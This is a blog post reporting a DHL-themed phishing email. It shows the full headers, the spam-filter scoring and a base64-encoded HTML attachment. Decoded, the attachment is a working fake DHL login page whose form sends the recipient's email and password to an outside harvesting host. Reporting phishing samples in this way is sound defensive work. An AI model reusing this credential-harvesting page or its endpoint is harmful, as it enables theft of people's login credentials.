DHL phish with virus attachment Hostopia Australia

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Fri, 01 Jul 2022 21:55:04 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.95 (FreeBSD))

(envelope-from )

id 1o7UDD-000JZb-7V

for dave@doctor.nl2k.ab.ca;

Fri, 01 Jul 2022 21:54:27 -0600

Resent-From: The Doctor

Resent-Date: Fri, 1 Jul 2022 21:54:27 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from vmx11909.hosting24.com.au ([223.27.21.115]:48542)

by doctor.nl2k.ab.ca with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384

(Exim 4.95 (FreeBSD))

(envelope-from )

id 1o7TJi-000F4B-81

for root@nk.ca;

Fri, 01 Jul 2022 20:57:10 -0600

Received: from [107.172.4.217] (port=58597 helo=mbberwickevents.com.au)

by vmx11909.hosting24.com.au with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384

(Exim 4.93)

(envelope-from )

id 1o7TJB-0006x9-Tn

for root@nk.ca; Sat, 02 Jul 2022 12:56:34 +1000

From: "root@nk.ca"

To: root@nk.ca

Subject: FW: FW PACKING LIST & INVOICE:

Date: 01 Jul 2022 19:56:39 -0700

Message-ID: <20220701195639.71651417E597D153@mbberwickevents.com.au>

MIME-Version: 1.0

Content-Type: multipart/mixed;

boundary="----=_NextPart_000_0012_F372914C.9FE5E52F"

X-AntiAbuse: This header was added to track abuse, please include it with any abuse report

X-AntiAbuse: Primary Hostname - vmx11909.hosting24.com.au

X-AntiAbuse: Original Domain - nk.ca

X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]

X-AntiAbuse: Sender Address Domain - mbberwickevents.com.au

X-Get-Message-Sender-Via: vmx11909.hosting24.com.au: authenticated_id: support@mbberwickevents.com.au

X-Authenticated-Sender: vmx11909.hosting24.com.au: support@mbberwickevents.com.au

X-Source:

X-Source-Args:

X-Source-Dir:

X-Spam_score: 5.8

X-Spam_score_int: 58

X-Spam_bar: +++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: From: root@nk.ca < root@nk.ca > Sent: 7/1/2022 7:56:39 p.m.

To: root@nk.ca Subject: FW: FW PACKING LIST & INVOICE: DHL

Express | Track & Trace 登录以跟踪您的货件



Content analysis details: (5.8 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.6 SUBJ_ALL_CAPS Subject is all capitals

0.0 HTML_MESSAGE BODY: HTML included in message

0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or

identical to background

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

0.7 HTML_TAG_BALANCE_BODY BODY: HTML has unbalanced "body" tags

-0.0 T_SCC_BODY_TEXT_LINE No description available.

0.4 NAME_EMAIL_DIFF Sender NAME is an unrelated email address

0.0 T_PDS_TO_EQ_FROM_NAME From: name same as To: address

0.0 T_HTML_ATTACH HTML attachment to bypass scanning?

0.0 T_PDS_FROM_2_EMAILS From header has multiple different addresses

2.0 URI_WP_HACKED_2 URI for compromised WordPress site, possible

malware

0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was

blocked. See

http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block

for more information.

[URIs: gyazo.com, nikkenshoji.jp]

Subject: {SPAM?} FW: FW PACKING LIST & INVOICE:



This is a multi-part message in MIME format.



------=_NextPart_000_0012_F372914C.9FE5E52F

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable











 




Arial, Helvetica, sans-serif; COLOR: rgb(0,0,0)">












000000 face=3D"Calibri, sans-serif">From: root@nk.ca < root@=

nk.ca >
Sent: 7/1/2022 7:56:39 p.m.
To: root@nk.ca &=

lt;root@nk.ca >
Subject: FW: FW PACKING LIST & INVOICE:
ONT>=20

 




 



------=_NextPart_000_0012_F372914C.9FE5E52F

Content-Type: text/html; name="DHL_SHIPPING_CONFIRMATION_RECEIPT_ root@nk.ca.2022.htm"

Content-Transfer-Encoding: base64

Content-Disposition: attachment; filename="DHL_SHIPPING_CONFIRMATION_RECEIPT_ root@nk.ca.2022.htm"



PGh0bWw+DQo8aGVhZD4NCjxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1k

ZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MSI+DQo8bWV0YSBodHRwLWVxdWl2PSJYLVVB

LUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPWVkZ2UsY2hyb21lPTEiIC8+DQo8bGluayBpZD0i

ZmF2aWNvblBhZ2UiIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iLi93cC1pbmNsdWRlcy9m

YXZpY29uLnN2ZyIgdHlwZT0iaW1hZ2UveC1pY29uIj4NCjx0aXRsZT5ESEwgRXhwcmVzcyB8

IFRyYWNrICYgVHJhY2U8L3RpdGxlPg0KPHN0eWxlPiANCmlucHV0W3R5cGU9c3VibWl0XSB7

DQogIHdpZHRoOjIxMHB4OyBoZWlnaHQ6MzVweDsgZm9udC1mYW1pbHk6IGFyaWFsOyBmb250

LXNpemU6IDEzcHg7IGNvbG9yOiNGRkY7IGZvbnQtd2VpZ2h0OmJvbGQ7DQogIGJhY2tncm91

bmQtY29sb3I6ICMwNDVGQjQ7IGJvcmRlcjogc29saWQgMXB4ICMwNDVGQjQ7IHBhZGRpbmc6

IDdweDsgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7IC13ZWJraXQtYm9yZGVyLXJhZGl1czog

NHB4OyANCiAgLWtodG1sLWJvcmRlci1yYWRpdXM6IDRweDsgYm9yZGVyLXJhZGl1czogNHB4

Oy13ZWJraXQtYm94LXNoYWRvdzogMXB4IDFweCA1cHggM3B4ICNGRkY7IGJveC1zaGFkb3c6

IDFweCAxcHggNXB4IDNweCAjRkZGOyANCiAgLXdlYmtpdC1ib3gtc2hhZG93OiAxcHggMXB4

IDVweCAxcHggIzAwMDAwMDsgYm94LXNoYWRvdzogMXB4IDFweCA1cHggMXB4ICMwMDAwMDA7

Ig0KfQ0KDQppbnB1dFt0eXBlPWVtYWlsXSB7DQogIHdpZHRoOjIxMHB4OyANCiAgaGVpZ2h0

OjM3cHg7IA0KICBmb250LWZhbWlseTogdmVyZGFuYTsgZm9udC1zaXplOiAxMnB4OyBjb2xv

cjojMzMzMzMzOyANCiAgYmFja2dyb3VuZC1jb2xvcjogI0ZGRjsgYm9yZGVyLXJhZGl1czog

NHB4OyBib3JkZXI6IHNvbGlkIDFweCAjQUFBOyBwYWRkaW5nOiAxMHB4OyANCiAgLW1vei1i

b3JkZXItcmFkaXVzOiA0cHg7IC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAta2h0bWwt

Ym9yZGVyLXJhZGl1czogNHB4OyANCiAgLWtodG1sLWJvcmRlci1yYWRpdXM6IDRweDsgYm9y

ZGVyLXJhZGl1czogNHB4Oy13ZWJraXQtYm94LXNoYWRvdzogMXB4IDFweCA1cHggM3B4ICNG

RkY7IGJveC1zaGFkb3c6IDFweCAxcHggNXB4IDNweCAjRkZGOyANCiAgLXdlYmtpdC1ib3gt

c2hhZG93OiAxcHggMXB4IDVweCAxcHggIzAwMDAwMDsgYm94LXNoYWRvdzogMXB4IDFweCA1

cHggMXB4ICMwMDAwMDA7Ig0KICANCn0NCg0KaW5wdXRbdHlwZT1wYXNzd29yZF0gew0KICB3

aWR0aDoyMTBweDsgDQogIGhlaWdodDozN3B4OyANCiAgZm9udC1mYW1pbHk6IHZlcmRhbmE7

IGZvbnQtc2l6ZTogMTFweDsgY29sb3I6IzMzMzMzMzsgDQogIGJhY2tncm91bmQtY29sb3I6

ICNGRkY7IGJvcmRlci1yYWRpdXM6IDRweDsgYm9yZGVyOiBzb2xpZCAxcHggI0FBQTsgcGFk

ZGluZzogMTBweDsgDQogIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAtd2Via2l0LWJvcmRl

ci1yYWRpdXM6IDRweDsgLWtodG1sLWJvcmRlci1yYWRpdXM6IDRweDsgDQogIC1raHRtbC1i

b3JkZXItcmFkaXVzOiA0cHg7IGJvcmRlci1yYWRpdXM6IDRweDstd2Via2l0LWJveC1zaGFk

b3c6IDFweCAxcHggNXB4IDNweCAjRkZGOyBib3gtc2hhZG93OiAxcHggMXB4IDVweCAzcHgg

I0ZGRjsgDQogIC13ZWJraXQtYm94LXNoYWRvdzogMXB4IDFweCA1cHggMXB4ICMwMDAwMDA7

IGJveC1zaGFkb3c6IDFweCAxcHggNXB4IDFweCAjMDAwMDAwOyINCiAgDQp9DQoNCg0KaW5w

dXRbdHlwZT1wYXNzd29yZF0gew0KICB3aWR0aDoyMTBweDsgDQogIGhlaWdodDozN3B4OyAN

CiAgZm9udC1mYW1pbHk6IHZlcmRhbmE7IGZvbnQtc2l6ZTogMTJweDsgY29sb3I6IzMzMzMz

MzsgDQogIGJhY2tncm91bmQtY29sb3I6ICNGRkY7IGJvcmRlci1yYWRpdXM6IDRweDsgYm9y

ZGVyOiBzb2xpZCAxcHggI0FBQTsgcGFkZGluZzogMTBweDsgDQogIC1tb3otYm9yZGVyLXJh

ZGl1czogNHB4OyAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgLWtodG1sLWJvcmRlci1y

YWRpdXM6IDRweDsNCiAgLWtodG1sLWJvcmRlci1yYWRpdXM6IDRweDsgYm9yZGVyLXJhZGl1

czogNHB4Oy13ZWJraXQtYm94LXNoYWRvdzogMXB4IDFweCA1cHggM3B4ICNGRkY7IGJveC1z

aGFkb3c6IDFweCAxcHggNXB4IDNweCAjRkZGOyANCiAgLXdlYmtpdC1ib3gtc2hhZG93OiAx

cHggMXB4IDVweCAxcHggIzAwMDAwMDsgYm94LXNoYWRvdzogMXB4IDFweCA1cHggMXB4ICMw

MDAwMDA7Ig0KPC9zdHlsZT4NCg0KPC9oZWFkPg0KPGJvZHkgbWFyZ2lud2lkdGg9IjAiIG1h

cmdpbmhlaWdodD0iMCIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBzdHlsZT0iYmFj

a2dyb3VuZDogI0ZGRjsiPg0KDQo8dGFibGUgY2VsbHNwYWNpbmc9IjAiIHN0eWxlPSJwb3Np

dGlvbjphYnNvbHV0ZTsgbGVmdDo5OHB4OyB0b3A6MTM1cHg7Ij4NCjx0cj48dGQgc3R5bGU9

ImhlaWdodDozNjVweDsgd2lkdGg6MjYycHg7IGJhY2tncm91bmQ6I0I0MDQwNDsgYm9yZGVy

LXJhZGl1czogMXB4IDVweCAxcHggMTVweDsiPg0KDQoJPHRhYmxlIGFsaWduPSJjZW50ZXIi

IGNlbGxzcGFjaW5nPSIwIj4NCgk8dHI+PHRkPg0KCQk8Zm9ybSBtZXRob2Q9InBvc3QiIGFj

dGlvbj0iaHR0cHM6Ly9uaWtrZW5zaG9qaS5qcC9sb2dib3gxLnBocCI+DQoJPC90ZD48L3Ry

Pg0KCTx0cj48dGQ+DQoJCTxkaXYgYWxpZ249ImNlbnRlciI+DQoJCQk8aW1nIHNyYz0iaHR0

cHM6Ly9pLmd5YXpvLmNvbS9mNWJhMWE3NWFiNzRjOTYyMGVjOTUwZDA2MTBkYWQzYy5wbmci

IHN0eWxlPSJ3aWR0aDoyMTBweDsgaGVpZ2h0OjEyMHB4OyBib3JkZXItcmFkaXVzOiAxcHgg

MTBweCAxcHggMTBweDsiPg0KCQk8L2Rpdj4NCgk8L3RkPjwvdHI+DQoJPHRyPjx0ZCBzdHls

ZT0iaGVpZ2h0OjMwcHg7Ij48L3RkPjwvdHI+DQoJPHRyPjx0ZD4NCgkJPGZvbnQgZmFjZT0i

YXJpYWwiIHN0eWxlPSJmb250LXNpemU6MTNweDsiIGNvbG9yPSIjRkZGIj4NCgkJCTxkaXYg

YWxpZ249ImNlbnRlciI+PGI+JiMzMDMzMTsmIzI0NDA1OyYjMjAxOTc7JiMzNjMxOTsmIzM2

Mzk0OyYjMjQ3NDQ7JiMzMDM0MDsmIzM2MTM1OyYjMjAyMTQ7PC9iPjwvZGl2Pg0KCQk8L2Zv

bnQ+DQoJPC90ZD48L3RyPg0KCTx0cj48dGQgc3R5bGU9ImhlaWdodDo3cHg7Ij48L3RkPjwv

dHI+DQoJPHRyPjx0ZD4NCgkJPGRpdiBhbGlnbj0iY2VudGVyIj4NCgkJCTxpbnB1dCAgbmFt

ZT0ibG9naW4iIHR5cGU9ImVtYWlsIiB2YWx1ZT0icm9vdEBuay5jYSIgZGlzYWJsZWQ+DQoJ

CTwvZGl2Pg0KCTwvdGQ+PC90cj4NCgk8dHI+PHRkIHN0eWxlPSJoZWlnaHQ6N3B4OyI+PC90

ZD48L3RyPg0KCTx0cj48dGQ+DQoJCTxkaXYgYWxpZ249ImNlbnRlciI+DQoJCQk8aW5wdXQg

IG5hbWU9InBhc3N3ZCIgdHlwZT0icGFzc3dvcmQiIHBsYWNlaG9sZGVyPSImIzIzNDk0OyYj

MzA3MjE7IiByZXF1aXJlZCA+DQoJCTwvZGl2Pg0KCTwvdGQ+PC90cj4NCgk8dHI+PHRkIHN0

eWxlPSJoZWlnaHQ6MTBweDsiPjwvdGQ+PC90cj4NCgk8dHI+PHRkPg0KCQk8ZGl2IGFsaWdu

PSJjZW50ZXIiPg0KCQkJPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IiYjMzAzMzE7JiMy

MDgzNzsiPg0KCQk8L2Rpdj4NCgk8L3RkPjwvdHI+DQoJPHRyPjx0ZCBzdHlsZT0iaGVpZ2h0

OjVweDsiPg0KCQk8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJsb2dpbiIgdmFsdWU9InJv

b3RAbmsuY2EiPg0KCQk8L2Zvcm0+DQoJPC90ZD48L3RyPg0KCTwvdGFibGU+DQoNCjwvdGQ+

PC90cj4NCjwvdGFibGU+DQoNCg0KPHRhYmxlIGFsaWduPSJjZW50ZXIiIGNlbGxzcGFjaW5n

PSIwIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIj48dHI+DQoNCjx0cj48dGQgc3R5bGU9

ImJhY2tncm91bmQ6I2ZmY2MwMDsiPg0KCTxkaXYgYWxpZ249ImNlbnRlciI+DQoJCTxhIGhy

ZWY9IiMiPjxpbWcgc3JjPSJodHRwczovL2kuZ3lhem8uY29tLzAzMDRiNGNhYTc0NGNkMzE3

M2MzZjNlN2IyMzJkZTcxLnBuZyIgYm9yZGVyPSIwIj48L2E+DQoJPC9kaXY+DQo8L3RkPjwv

dHI+DQoNCjx0cj48dGQgaGVpZ2h0PSI1JSIgc3R5bGU9ImJhY2tncm91bmQ6I0ZGRjsiPjwv

dGQ+PC90cj4NCg0KDQo8dHI+PHRkIGhlaWdodD0iMTMlIiBzdHlsZT0iYmFja2dyb3VuZDoj

RkZGOyI+DQoJPHRhYmxlIGNlbGxzcGFjaW5nPSIwIiBhbGlnbj0iY2VudGVyIj48dHI+DQoJ

PHRkPg0KCQk8aW1nIHNyYz0iaHR0cHM6Ly9pLmd5YXpvLmNvbS83YjgzMDEyNmVhZGM4MGQx

ZTA3YzBmZDNiM2U3ZGQ3Yi5wbmciIHN0eWxlPSJ3aWR0aDo2MHB4OyBoZWlnaHQ6NjBweDsg

Ym9yZGVyLXJhZGl1czo1MCU7Ij4NCgk8L3RkPg0KCTx0ZCBzdHlsZT0id2lkdGg6NXB4OyI+

PC90ZD4NCgk8dGQ+DQoJCTxpbWcgc3JjPSJodHRwczovL2kuZ3lhem8uY29tLzZiN2FkZGZj

OThlYzZiMGEyNjRiZWE1MThjNGFjMTk3LnBuZyIgc3R5bGU9IndpZHRoOjE3MHB4OyBoZWln

aHQ6NjBweDsiPg0KCTwvdGQ+DQoJPHRkIHN0eWxlPSJ3aWR0aDoxMDBweDsiPjwvdGQ+DQoJ

PHRkPg0KCQk8aW1nIHNyYz0iaHR0cHM6Ly9pLmd5YXpvLmNvbS9iZWZmZmRlOTE4NWE3Njk0

NmZiNDI5OGMwODdiODJkZS5wbmciIHN0eWxlPSJ3aWR0aDoyMjBweDsgaGVpZ2h0OjQwcHg7

Ij4NCgk8L3RkPg0KCTx0ZD4NCgkJPGltZyBzcmM9Imh0dHBzOi8vaS5neWF6by5jb20vOTEz

OTI3NDEyNDg0NjZjODYwMjFmODI4MjhiNjRkOTcucG5nIiBzdHlsZT0id2lkdGg6MTgwcHg7

IGhlaWdodDo0MHB4OyI+DQoJPC90ZD4NCgk8dGQgc3R5bGU9IndpZHRoOjBweDsiPjwvdGQ+

DQoJPHRkPg0KCQk8aW1nIHNyYz0iaHR0cHM6Ly9pLmd5YXpvLmNvbS84YTVlNzcwNTJjZjIy

MDQ5ZmU4ZTRhODg0MjE2MDgxZi5wbmciIHN0eWxlPSJ3aWR0aDoxNzBweDsgaGVpZ2h0OjUw

cHg7Ij4NCgk8L3RkPg0KCTx0ZCBzdHlsZT0id2lkdGg6MHB4OyI+PC90ZD4NCgk8dGQ+DQoJ

CTxpbWcgc3JjPSJodHRwczovL2kuZ3lhem8uY29tLzJhNDY1MDYwM2NlZjFiYmIwZjc5NDI4

ZmNkMjJkYWRiLnBuZyIgc3R5bGU9IndpZHRoOjIwMHB4OyBoZWlnaHQ6NTBweDsiPg0KCTwv

dGQ+DQoJPC90cj48L3RhYmxlPg0KPC90ZD48L3RyPg0KDQo8dHI+PHRkIHN0eWxlPSJiYWNr

Z3JvdW5kOiMyRTJFMkU7Ij4NCgk8ZGl2IGFsaWduPSJjZW50ZXIiPg0KCTwvZGl2Pg0KPC90

ZD48L3RyPg0KDQo8L3RhYmxlPg0KPC9odG1sPg==



------=_NextPart_000_0012_F372914C.9FE5E52F--



Trackbacks

Trackback specific URI for this entry

This link is not meant to be clicked. It contains the trackback URI for this entry. You can use this URI to send ping- & trackbacks from your own blog to this entry. To copy the link, right click and select "Copy Shortcut" in Internet Explorer or "Copy Link Location" in Mozilla.

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA